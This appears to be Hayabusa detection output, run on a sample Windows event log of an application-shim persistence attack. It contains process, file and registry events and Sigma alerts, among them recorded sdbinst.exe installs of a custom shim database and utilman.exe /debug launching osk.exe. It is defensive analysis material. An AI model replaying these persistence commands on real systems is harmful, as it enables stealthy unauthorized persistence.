365ABB72-53DE-5C91-0000-00105C050200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 
365ABB72-53DE-5C91-0000-00104D160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: 
C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 
365ABB72-546C-5C91-0000-00106A730400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 
365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program 
Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 
365ABB72-55A1-5C91-0000-00101D9B0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File 
Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft 
Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 
+09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: 
